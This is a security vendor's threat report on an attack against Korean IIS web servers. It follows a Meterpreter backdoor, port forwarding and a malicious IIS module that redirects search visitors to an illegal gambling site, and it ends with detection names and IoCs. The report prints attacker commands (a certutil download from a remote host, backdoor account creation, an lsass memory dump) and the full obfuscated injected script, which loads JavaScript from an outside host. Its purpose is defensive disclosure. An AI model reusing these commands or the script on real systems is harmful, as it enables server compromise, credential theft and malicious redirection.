Malware Distribution Linked to Illegal Korean Gambling Website Targeting Web Server

AhnLab SEcurity intelligence Center (ASEC) has discovered evidence of a malware strain being distributed to web servers in South Korea, leading users to an illegal gambling site. After initially infiltrating a poorly managed Windows Internet Information Services (IIS) web server in Korea, the threat actor installed the Meterpreter backdoor, a port forwarding tool, and an IIS module malware tool. They then used ProcDump to exfiltrate account credentials from the server. IIS modules support expansion features of web servers such as authentication, HTTP responses, and logging. Modules can be developed using ISS C++ API or ASP.NET 2.0 API.

Figure 1. Meterpreter backdoor being distributed from a Korean website (logs from AhnLab Smart Defense infrastructure)

The IIS module malware discovered in this case monitors for a string in the HTTP header in the web server where the module is installed and sends a modified response value when certain conditions are met to expose ads for an illegal gambling website on Korean and Chinese portal websites. When users click the link, they are redirected to the illegal gambling website.

1. Meterpreter Backdoor

Before installing the Meterpreter backdoor in the web server, the threat actor executed various normal utilities such as ipconfig and systeminfo. The attacker’s behavior is likely done to collect information on the attack target before installing the IIS module malware. Table 1 below shows a timeline of the commands used by the threat actor.

Command Execution Time Executed CMD Command
Apr. 9, 2024 03:43:12 ipconfig
Apr. 9, 2024 03:45:32 systeminfo
Apr. 9, 2024 03:45:49 whoami
Apr. 9, 2024 03:56:20 powershell whoami
Apr. 9, 2024 04:17:13 hostname
Apr. 9, 2024 04:17:21 net1 user
Apr. 9, 2024 04:17:42 query user
Apr. 9, 2024 04:22:10 ping 45.154.12.215
Apr. 9, 2024 04:23:18 curl
Apr. 9, 2024 04:23:56 certutil
Apr. 9, 2024 04:28:20 certutil -urlcache -split -f hxxp://m****k*****l[.]com/msf.txt
Apr. 9, 2024 04:32:20 %ALLUSERSPROFILE%xx.txt
Table 1. Commands used by the threat actor (1)

The Meterpreter backdoor is executed after being given the threat actor’s IP and port number. Based on the analysis of the backdoor code, it is likely that the code communicated with the threat actor’s server to receive and execute a shellcode.

Figure 2. Meterpreter backdoor code

2. HTran (Port Forwarding Tool)

After installing the Meterpreter backdoor, the threat actor additionally installed the HTran utility through the w3wp.exe process. HTran is a port forwarding tool whose source code is published on GitHub. Port forwarding is a feature where data transmitted to a certain port is forwarded to another port. While it can be used in various ways depending on the threat actor, in most cases, HTran enables remote communication with the RDP port.

Figure 3. HTran installation logs

After installing the Meterpreter backdoor and HTran port forwarding tool, the threat actor created an attacker account to maintain persistence in the target system and establish a foothold. By creating the account, the threat actor can easily access the web server from outside without needing account credentials for that server.

Command Execution Time Executed CMD Command (Add Account)
Apr. 9, 2024 05:04:51 net user kr$ test123!@# /add
Table 2. Commands used by the threat actor (2)

It took less than 2 hours for the threat actor to compromise the server, from initial access to the target to establishing a foothold and maintaining persistence. After maintaining persistence, the threat actor created the IIS module malware.

Figure 4. Logs showing the IIS module malware being created using the Meterpreter backdoor

3. IIS Module Malware

Ordinarily, IIS modules exist in the DLL format in the path C:WindowsSystem32inetsrv and are loaded onto w3wp.exe (an IIS worker process) to be run. In order to be executed after being loaded onto w3wp.exe, IIS C++ API must be used and the Export function must contain RegisterModule. When the modules are run, the information on the HTTP header requested to the IIS web server is transmitted to the event handler in RegisterModule. Each handler can process the requests for HTTP headers. Out of many handler values, the identified malware strain injected the malware into the OnSendResponse handler so that whenever a SendResponse event takes place in the IIS web server, the malicious handler (sub_7FFB3DB7E840) is executed instead.

OnSendResponse
-> Represents the method that will handle a SendResponse event, which occurs when IIS sends the response buffer.

Figure 5. The malicious handler information of the IIS module malware

The installed malware strain manipulates the response value for the HTTP header information requested to the web server. It checks the User-Agent, Referer, and other values of the incoming HTTP header to check the inflow path of the web page. If it contains strings related to certain search portal websites, the malware returns a link to an illegal gambling-related page instead of a normal web page.

Figure 6. A breached Korean website

Searching for information on a compromised Korean website on the portal website shows illegal online gambling-related pages (see Figure 7).

Figure 7. Online illegal gambling pages shown on the search portal
Figure 8. An illegal online gambling page

In order for a website to be exposed on the search portal website, the web server must be exposed to the search engine. In the process of the search engine approaching the webpage and collecting information, the search engine’s HTTP header information is transmitted to the web server. When the header value matches certain keywords, the malware determines it to be a search engine requesting access. Then, it transmits to the search engine the meta tag information including the title, keyword, and description of an illegal online gambling website.

Figure 9. Referer value when accessing the web page through the portal website
Figure 10. Keywords checked by the malicious IIS module for the meta tag information

Through such process, users are shown with illegal online gambling sites despite searching for normal sites on the portal website. The following information shows the search engines that the malware checks and an explanation of other key features.

[1] Sends a script response that redirects to “hxxps://ll.olacityviet.com/av.js” when matches to certain keywords are found
Checks for the inclusion of the following keywords in the User-Agent header
– naver|sogou|360|yisou|daum|google|coccoc
Checks for the inclusion of the following keywords in the Referer header
– naver.com|so.com|sogou.com|sm.cn|daum.net|google|coccoc

[2] Steals cookie information from the HTTP header

The obfuscated script code below is the response value to the HTTP approach, which is the code that the malware injects into the normal response value. Due to this code, users are redirected to the illegal online gambling website URL.

<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return 'w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('b' + e(c) + 'b', 'g'), k[c]);
    return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!''.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f'\w+'};c=1};j(c--)h(k[c])p=p.i(q s('\b'+e(c)+'\b','g'),k[c]);f p}('1["2"]["3"]('<0 4="5/6" 7="8://9.a/b.c"></0>');',l,l,'t|u|v|x|y|z|A|B|C|D|E|F|G'.H('|'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|https|ll.olacityviet|com|av|js|split'.split('|'), 0, {})) </script>

The following is the decryption code.

document.write('<script src="hxxps://ll.olacityviet.com/av[.]js"></script>');

Particular caution is advised because although the malware currently redirects users to an illegal online gambling website, it can perform other malicious behaviors depending on the response script.

4. Circumstance of Exploiting ProcDump

After installing the IIS module malware, the threat actor used ProcDump to dump the process memory of the current web server’s lsass.exe. This is an act of stealing account credentials in a way similar to Mimikatz and was probably used for lateral movement to another server connected to the web server.

Command Execution Time Executed CMD Command
Apr. 10, 2024 00:20:44 %ALLUSERSPROFILE%p.exe -accepteula -ma lsass.exe C:ProgramDataxxx.zip
Table 3. Commands used by the threat actor (3)

5. Conclusion

The threat actor attempted to initially infiltrate a poorly managed Windows web server and went through the following processes: establishing a foothold, maintaining persistence, achieving their goals, and obtaining account credentials for lateral movement. Currently, search engines such as Shodan and FOFA can be used to find information on the IP address, port, services in use, and OS information of devices connected to the Internet around the world. It is deemed that the threat actor would also use these search engines to search for attack targets. Thus security managers of enterprises must identify assets that may be exposed to threat actors through attack surface management and manage them, such as applying the latest security patches.

File Detection
Meterpreter Backdoor
– Trojan/Win.Meterpreter.C644410 (2024.04.09.02)

IIS module malware (x64)
– Trojan/Win.Generic.C5408521 (2023.04.10.02)

IIS module malware (x86)
– Trojan/Win.Backdoor.C578523 (2023.01.18.03)

IoCs
MD5s

Meterpreter Backdoor
– d5312ab7f01fd74d399c392effdfe437

IIS module malware (x64)
– ebeb931a6dd91a227225f0ff92142f2b

IIS module malware (x86)
– 28dd72e322f6be382dac4fa9eb5cd09b

C&C URLs
C&C address of the Meterpreter backdoor
– 43.156.50[.]76
Illegal online gambling link-related URLs
– hxxp://ll.olacityviet[.]com
– hxxp://jsc.olacityviet[.]com
– hxxps://ll.olacityviet[.]com/av.js

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Case of Malware Distribution Linking to Illegal Gambling Website Targeting Korean Web Server appeared first on ASEC BLOG.